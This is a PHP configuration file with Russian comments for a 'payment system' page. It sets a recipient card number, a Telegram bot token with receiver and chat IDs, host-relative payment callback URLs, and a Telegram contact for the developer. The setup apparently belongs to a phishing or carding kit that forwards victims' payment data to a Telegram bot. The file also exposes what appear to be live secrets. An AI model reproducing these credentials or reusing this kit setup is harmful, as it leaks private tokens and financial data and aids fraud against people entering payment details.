<?php

/* При внесении изменений в этот файл обязательно
 * следите за тем, чтобы внесенные изменения были
 * в одинаковых кавычках. Если у Вас возникли какие-либо
 * трудности в процессе настройки, то свяжитесь с разработчиком
 * в Telegram: @PAP1LLON
*/


// Заголовок страницы.
$title = "Платежная система";

// Заголовок формы (для обычных платежей).
$heading = "Платежная информация";

// Номера карт получателя. Указывайте номер без пробелов и прочих символов.
$destination_card = "4890494691971253";

// Токен бота в Telegram.
$bot_token = "885237573:AAF5DkIcm3JxcMgdUdvU-LH7xRmYLbAb5RE";

// Идентификатор аккаунта в Telegram.
$bot_receiver = "542340777";

// Идентификатор беседы в Telegram.
$bot_receiver_add = "-1001342970710";


/* Далее идут системные настройки, которые при изменении
 * могут повлиять на работу платежной системы, изменять
 * их требуется только при уведомлении об этом разработчика.
*/

// Страница успешной оплаты.
$success_url = "https://" . $_SERVER["HTTP_HOST"] . "/merchant/success.php";

// Страница ошибки оплаты.
$error_url = "https://" . $_SERVER["HTTP_HOST"] . "/merchant/fail.php";

// Адрес оповещения.
$callback_url = "https://" . $_SERVER["HTTP_HOST"] . "/merchant/callback.php";

// Адрес обработчика статуса.
$status_url = "https://" . $_SERVER["HTTP_HOST"] . "/merchant/status.php";

?>
